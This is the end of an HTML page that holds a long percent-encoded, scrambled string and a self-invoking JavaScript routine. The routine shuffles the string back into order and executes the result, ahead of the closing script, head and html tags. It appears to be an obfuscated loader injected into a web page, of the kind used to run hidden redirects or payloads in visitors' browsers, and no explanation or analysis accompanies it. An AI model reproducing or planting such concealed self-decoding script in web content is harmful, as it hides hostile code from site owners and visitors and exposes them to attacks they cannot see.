v%252t%25%25s5m50h503t2vs2ipvep%252%25e3zei%25/%25elEsxh-SZ1em0sa3%25r%25n/t2ei53r2cg3rvsiy2p5i2=tc3%25e0c35%252/s0p5C.2is2i22t3igc.2252ts30n/%25t%25ele5ya--Eh3E3lvra25v2Epp.gvvfg%25%25l5m/a2/lE35eil2eCn3i=/3b53s35tebla25g%25n//2i/epgvi0-v2205Ee2fC%25cr3gl/vhra25igvncn253D5r2%25533h0eddE5.n%25v2=2Ci2l/m0ls5x%25me5seEEg22i25a5c555e%25s3E/i%25%250202525%25cl%25C0:v20l2evr.nh%25=ia/li9-59%25l%25et5e2073m2p309td0n223%25cchtelvmvCav2i25vi-8e=a=Syv5pns55Cec=sgkce%252E5p2e%252%252ve53%253ti%25555sd1t25ecC%252ha/2e/Qim5.a5fedC2d2%25a%253vi2=t.%25vpvi=ls5gt382-pl03C5rt/Ehrto2il%25scio2%25nalt222gg2t%25nE5/iC5.a23i035psdV%25d00a2Cn252=2=40%25%25v2pon.9p3mtc/%252i5/2nvi%2535t5%25%25gnC9v2e=ist/n:4cvsb52Csv:e2m0is022Cr-Eo=E%25CheteVps2e5l5a%255mS-v29E3o5lsh%25imsag25yiv0:avl23/ejm5l052es02ns2e%25cCt%2523i2pc3i2iE-tr3mgiv.%25C2csaie2%25bn=vl=c%25ce0evvEsgiv%25hrvbctsrj3%25l%25r235e3E2e%25//3te53nC5aea5ebe/-%25i%25e=/s=355Cav%252veg%252ElE5a5a-0%25%253p555.ti%25xemearr%25C%25s253022e.2g3a2%25%2530no%25i1/vs552/i3%25mEC2gt2E%252/53/5rrv%25%2533c-Cprn9xcCXai2aadrcp2.e%25%25n55nM3m2Ed/v3es%25rWei.0c%25Qcte2va.vpcEl2iY=%252%25gnn25e2l5vpvt2%25nCdl/:%25Pve2Et05tCoe0.ias5=0shl-i22EcrgE=2e%25:2mol5r=d=h5a2cads.ssntt=vi-0/0r2%25g2i5c2:(Sia2esrnt/%25%25.rlrl25eepNn55s2=v-cl/p5-a3r35tE2%25g%25jln=3cy5%25ec=3%255)Eeih3v%252lv5E1C=rns2mgn=-lg%255a-d7g+p:tg2l-if/53533eDfC2.3nrn=%25tft-tS2-avl,3nn2g,=50hik0-rf.%25%25d0E5Be52He2ihDe;2%25,ltl-52,%253v3&;kD)2f5&o2%255iCsK0255;(2eg0lt=/0h5l.Dd%25g/l%25ic),p,2il%25E-r35t5+Cl3%25.2C5glDsbl=kh)dB.1s/2D2+is/a7YBd2b%25=t=225ei;,EnEso%25%25%25m33%25f-3%25cnv3hs3ol)(;ll2n%25fg=21t5,p23=tjB)h=hgg30g%255).i22D)nnC=5)t7,ks%25cEvt+lg-.cBkt%25p(,hs%22%2555)jnlt%22C===%250ht%25n%25ce(-,5ge%25e=nh.;1t%3E2kCe=-%25-la%25le=kj)2(-eblfe%251-(2-n,)%5Dg/jm(e&hf.ntM2l-tn%5B,cc()h+%5Bo4%5D.phfik=%5B(hc%25ns(=.;rkk2%5D5nb,ec=.e)=g;kl;=B%5DCnb)(3ln-ti)1sn%3C-2=li;sla)eh0;tegglej+/kklel%25k==(lt,k%3E%3Epro=p%5Bi)e.gf%5D;vlkk,.=l)Cf.2t.%5Bm,&,%22%22/l,0%25lrk1=5g=thl=++%22il=2%5B.%5Dg%7C%25g,%7D)%7C%25%3C/gcli%25tg")).split(""),g=k.length%j.length,l=k.length-1;l>=0;l--)g--,-1==g&&(g=j.length-1),f=l+j[g],f>=k.length||(c=k[l],b=k[f],k[f]=c,k[l]=b);for(n=m,i="",l=0;l<k.length;l++)i+=k[l];n(i)})();

</script>
    
</head>
</html>
